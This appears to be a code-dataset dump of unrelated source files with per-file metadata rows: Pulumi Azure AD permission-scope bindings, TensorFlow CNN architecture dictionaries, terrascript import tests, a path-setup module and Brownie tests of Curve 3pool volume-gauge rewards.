:param pulumi.Input[str] type: Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
:param pulumi.Input[str] user_consent_description: Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
:param pulumi.Input[str] user_consent_display_name: Display name for the delegated permission that appears in the end user consent experience.
:param pulumi.Input[str] value: The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApplicationOauth2PermissionScopeState.__new__(_ApplicationOauth2PermissionScopeState)
__props__.__dict__["admin_consent_description"] = admin_consent_description
__props__.__dict__["admin_consent_display_name"] = admin_consent_display_name
__props__.__dict__["application_object_id"] = application_object_id
__props__.__dict__["enabled"] = enabled
__props__.__dict__["is_enabled"] = is_enabled
__props__.__dict__["permission_id"] = permission_id
__props__.__dict__["scope_id"] = scope_id
__props__.__dict__["type"] = type
__props__.__dict__["user_consent_description"] = user_consent_description
__props__.__dict__["user_consent_display_name"] = user_consent_display_name
__props__.__dict__["value"] = value
return ApplicationOauth2PermissionScope(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="adminConsentDescription")
def admin_consent_description(self) -> pulumi.Output[str]:
"""
Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_description")
@property
@pulumi.getter(name="adminConsentDisplayName")
def admin_consent_display_name(self) -> pulumi.Output[str]:
"""
Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_display_name")
@property
@pulumi.getter(name="applicationObjectId")
def application_object_id(self) -> pulumi.Output[str]:
"""
The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "application_object_id")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Determines if the permission scope is enabled. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "is_enabled")
@property
@pulumi.getter(name="permissionId")
def permission_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "permission_id")
@property
@pulumi.getter(name="scopeId")
def scope_id(self) -> pulumi.Output[str]:
"""
Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "scope_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userConsentDescription")
def user_consent_description(self) -> pulumi.Output[str]:
"""
Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
"""
return pulumi.get(self, "user_consent_description")
@property
@pulumi.getter(name="userConsentDisplayName")
def user_consent_display_name(self) -> pulumi.Output[str]:
"""
Display name for the delegated permission that appears in the end user consent experience.
"""
return pulumi.get(self, "user_consent_display_name")
@property
@pulumi.getter
def value(self) -> pulumi.Output[str]:
"""
The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
return pulumi.get(self, "value")
| 55.485884 | 295 | 0.693268 | 4,620 | 37,342 | 5.400866 | 0.05303 | 0.061278 | 0.064524 | 0.052902 | 0.917161 | 0.907262 | 0.894598 | 0.88001 | 0.866143 | 0.848108 | 0 | 0.006991 | 0.222404 | 37,342 | 672 | 296 | 55.568452 | 0.852326 | 0.367709 | 0 | 0.723192 | 1 | 0.029925 | 0.183811 | 0.075265 | 0 | 0 | 0 | 0 | 0 | 1 | 0.154613 | false | 0.002494 | 0.012469 | 0.014963 | 0.259352 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
31c18b839d8976064b897d1a6451adc7ebd57d28 | 6,929 | py | Python | architectures.py | cuckookernel/CarND-Traffic-Signs | 3a84ce64e7cc79053fc0a62cb7d8a3755f4ecd52 | [
"MIT"
] | null | null | null | architectures.py | cuckookernel/CarND-Traffic-Signs | 3a84ce64e7cc79053fc0a62cb7d8a3755f4ecd52 | [
"MIT"
] | null | null | null | architectures.py | cuckookernel/CarND-Traffic-Signs | 3a84ce64e7cc79053fc0a62cb7d8a3755f4ecd52 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 28 14:36:00 2018
@author: mrestrepo
"""
import tensorflow as tf
layer1_depth = 8
layer3_depth = 16
arch_lenet_8 = [ None, # index=0 won't be used
# layer 1 : conv2d
{ 'type' : 'conv2d', 'W_pars' : ( 5, 5, 8), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv1'},
# layer 2 : max pool
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p1' },
# layer 3 : conv2d
{ 'type' : 'conv2d', 'W_pars' : (5, 5, layer3_depth), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv2'},
# layer 4 : max_pool
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p2' },
# layer 5 : flatten
{ 'type' : 'flatten', 'name' : 'flat1'},
#layer 6 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 120, 'nonlinear' : tf.nn.relu, 'name' : 'fc1'},
#layer 7 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 84, 'nonlinear' : tf.nn.relu, 'name' : 'fc2'},
#layer 8 : fully_connected - no relu afterwards
{ 'type' : 'fully_connected', 'out_dim' : 43, 'nonlinear' : None, 'name' : 'logits' }
]
# The following yielded 93.17 % with depth-3 images Adam( lr=0.0005 ) batch_size=256, epoch=168
arch_3_3 = [ None, # index=0 won't be used
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 16), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv1'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p1' },
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv2'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p2' },
{ 'type' : 'conv2d', 'W_pars' : ( 5, 5, 16), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv3'},
# layer 4 : max_pool
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p3' },
# layer 5 : flatten
{ 'type' : 'flatten', 'name' : 'flat1'},
#layer 6 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 120, 'nonlinear' : tf.nn.relu,
'name' : 'fc1'},
#layer 7 : fully_connected
{ 'type' : 'dropout', 'keep_prob_ph' : 'keep_prob', 'name' : 'dropout_1' },
{ 'type' : 'fully_connected', 'out_dim' : 84, 'nonlinear' : tf.nn.relu,
'name' : 'fc2'},
#layer 8 : fully_connected - no relu afterwards
{ 'type' : 'dropout', 'keep_prob_ph' : 'keep_prob', 'name' : 'dropout_2' },
{ 'type' : 'fully_connected', 'out_dim' : 43,
'nonlinear' : None, 'name' : 'logits' },
]
arch_3_3_b = [ None, # index=0 won't be used
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv1'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p1' },
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv2'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p2' },
{ 'type' : 'conv2d', 'W_pars' : ( 5, 5, 16), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv3'},
# layer 4 : max_pool
#{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
# 'padding' : 'SAME', 'name' : 'max_p3' },
# layer 5 : flatten
{ 'type' : 'flatten', 'name' : 'flat1'},
#layer 6 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 120, 'nonlinear' : tf.nn.relu,
'name' : 'fc1'},
{ 'type' : 'dropout', 'keep_prob_ph' : 'keep_prob', 'name' : 'dropout_1' },
#layer 7 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 84, 'nonlinear' : tf.nn.relu,
'name' : 'fc2'},
{ 'type' : 'dropout', 'keep_prob_ph' : 'keep_prob', 'name' : 'dropout_2' },
#layer 8 : fully_connected - no relu afterwards
{ 'type' : 'fully_connected', 'out_dim' : 43, 'nonlinear' : None, 'name' : 'logits' }
]
arch_3_3_c = [ None, # index=0 won't be used
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 64), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv1'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p1' },
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv2'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p2' },
{ 'type' : 'conv2d', 'W_pars' : ( 5, 5, 16), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv3'},
# layer 4 : max_pool
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p3' },
# layer 5 : flatten
{ 'type' : 'flatten', 'name' : 'flat1'},
#layer 6 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 120, 'nonlinear' : tf.nn.relu, 'name' : 'fc1'},
#layer 7 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 84, 'nonlinear' : tf.nn.relu, 'name' : 'fc2'},
#layer 8 : fully_connected - no relu afterwards
{ 'type' : 'fully_connected', 'out_dim' : 43, 'nonlinear' : None, 'name' : 'fc3' }
]
arch_3_3_2fc = [ None, # index=0 won't be used
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv1'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p1' },
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv2'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p2' },
{ 'type' : 'conv2d', 'W_pars' : ( 5, 5, 16), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv3'},
# layer 4 : max_pool
#{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
# 'padding' : 'SAME', 'name' : 'max_p3' },
# layer 5 : flatten
{ 'type' : 'flatten', 'name' : 'flat1'},
#layer 6 : fully_connected
#{ 'type' : 'fully_connected', 'out_dim' : 120, 'nonlinear' : tf.nn.relu, 'name' : 'fc1'},
#layer 7 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 84, 'nonlinear' : tf.nn.relu, 'name' : 'fc2'},
{ 'type' : 'dropout', 'keep_prob_ph' : 'keep_prob', 'name' : 'dropout_1' },
#layer 8 : fully_connected - no relu afterwards
{ 'type' : 'fully_connected', 'out_dim' : 43, 'nonlinear' : None, 'name' : 'logits' }
]
| 40.052023 | 101 | 0.476548 | 904 | 6,929 | 3.509956 | 0.108407 | 0.026473 | 0.026473 | 0.035298 | 0.927829 | 0.927829 | 0.927829 | 0.893791 | 0.893791 | 0.893791 | 0 | 0.081147 | 0.290374 | 6,929 | 172 | 102 | 40.284884 | 0.564165 | 0.186318 | 0 | 0.787234 | 0 | 0 | 0.345806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.010638 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7352db07f804eaf4e57ccdde7d9f3ffa19fc02ba | 1,083 | py | Python | tests/test_provider_kradalby_opnsense.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_kradalby_opnsense.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_kradalby_opnsense.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_kradalby_opnsense.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:23:52 UTC)
def test_provider_import():
import terrascript.provider.kradalby.opnsense
def test_resource_import():
from terrascript.resource.kradalby.opnsense import opnsense_firewall_alias
from terrascript.resource.kradalby.opnsense import opnsense_firewall_alias_util
from terrascript.resource.kradalby.opnsense import opnsense_wireguard_client
from terrascript.resource.kradalby.opnsense import opnsense_wireguard_server
def test_datasource_import():
from terrascript.data.kradalby.opnsense import opnsense_firewall_alias
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.kradalby.opnsense
#
# t = terrascript.provider.kradalby.opnsense.opnsense()
# s = str(t)
#
# assert 'https://github.com/kradalby/terraform-provider-opnsense' in s
# assert '0.0.2-pre' in s
| 30.942857 | 83 | 0.784857 | 138 | 1,083 | 5.992754 | 0.463768 | 0.174123 | 0.133011 | 0.181378 | 0.460701 | 0.361548 | 0.309553 | 0.309553 | 0.159613 | 0 | 0 | 0.016043 | 0.136657 | 1,083 | 34 | 84 | 31.852941 | 0.868449 | 0.469067 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029412 | 0 | 1 | 0.333333 | true | 0 | 1 | 0 | 1.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
73593c7cc1665e17f7ad808f119b69821fd2aeb0 | 151 | py | Python | minos/__init__.py | qorrect/sisy | 4c279f3a47109395d57521b5c8144b18693737fc | [
"Apache-2.0"
] | 6 | 2017-09-15T03:14:10.000Z | 2019-12-03T04:15:21.000Z | minos/__init__.py | qorrect/sisy | 4c279f3a47109395d57521b5c8144b18693737fc | [
"Apache-2.0"
] | 2 | 2017-09-21T01:49:42.000Z | 2017-09-23T16:33:01.000Z | minos/__init__.py | qorrect/sisy | 4c279f3a47109395d57521b5c8144b18693737fc | [
"Apache-2.0"
] | null | null | null | from os.path import os
HERMES_BASE_PATH = os.path.dirname(os.path.realpath(__file__))
PROJECT_BASE_PATH = os.path.dirname(os.path.realpath(__file__))
| 30.2 | 63 | 0.801325 | 25 | 151 | 4.36 | 0.4 | 0.275229 | 0.183486 | 0.256881 | 0.715596 | 0.715596 | 0.715596 | 0.715596 | 0.715596 | 0 | 0 | 0 | 0.072848 | 151 | 4 | 64 | 37.75 | 0.778571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
b401b7ab030a1a8bb97c3270a04546398afee065 | 9,031 | py | Python | tests/test_02_threepoolvolgauge.py | taariq/volumegauge | f92ea90f4eefab9079fd624bddbe0e3cf5684f80 | [
"Apache-2.0"
] | 3 | 2020-12-17T01:11:08.000Z | 2020-12-24T08:06:07.000Z | tests/test_02_threepoolvolgauge.py | taariq/volumegauge | f92ea90f4eefab9079fd624bddbe0e3cf5684f80 | [
"Apache-2.0"
] | 13 | 2020-11-22T20:24:23.000Z | 2021-01-07T20:19:57.000Z | tests/test_02_threepoolvolgauge.py | taariq/volumegauge | f92ea90f4eefab9079fd624bddbe0e3cf5684f80 | [
"Apache-2.0"
] | 3 | 2020-12-17T18:32:46.000Z | 2020-12-23T21:57:47.000Z | #!/usr/bin/python3
import pytest
PERIOD = 30
DENOMINATOR = 10 ** 18
SMOOTHING = 2
ALPHA = DENOMINATOR - SMOOTHING * DENOMINATOR / (PERIOD + 1)
def test_exchange_dai_to_usdc(_threepoolvolgauge, threepool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _threepoolvolgauge.exchange(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = threepool.exchange(0, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_usdc_to_dai(_threepoolvolgauge, threepool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _threepoolvolgauge.exchange(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = threepool.exchange(1, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_dai_to_usdt(_threepoolvolgauge, threepool, DAI, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _threepoolvolgauge.exchange(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = threepool.exchange(0, 2, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(DAI)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(DAI)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_usdt_to_dai(_threepoolvolgauge, threepool, USDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _threepoolvolgauge.exchange(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = threepool.exchange(2, 0, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_usdc_to_usdt(_threepoolvolgauge, threepool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _threepoolvolgauge.exchange(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = threepool.exchange(1, 2, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_usdt_to_usdc(_threepoolvolgauge, threepool, USDT, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _threepoolvolgauge.exchange(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = threepool.exchange(2, 1, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDT)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDT)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
| 59.026144 | 130 | 0.645665 | 1,002 | 9,031 | 5.573852 | 0.061876 | 0.103133 | 0.081647 | 0.066607 | 0.977977 | 0.9735 | 0.9735 | 0.9735 | 0.9735 | 0.9735 | 0 | 0.022409 | 0.224228 | 9,031 | 152 | 131 | 59.414474 | 0.774764 | 0.001882 | 0 | 0.839161 | 0 | 0 | 0.116498 | 0.035948 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041958 | false | 0 | 0.006993 | 0 | 0.048951 | 0.293706 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.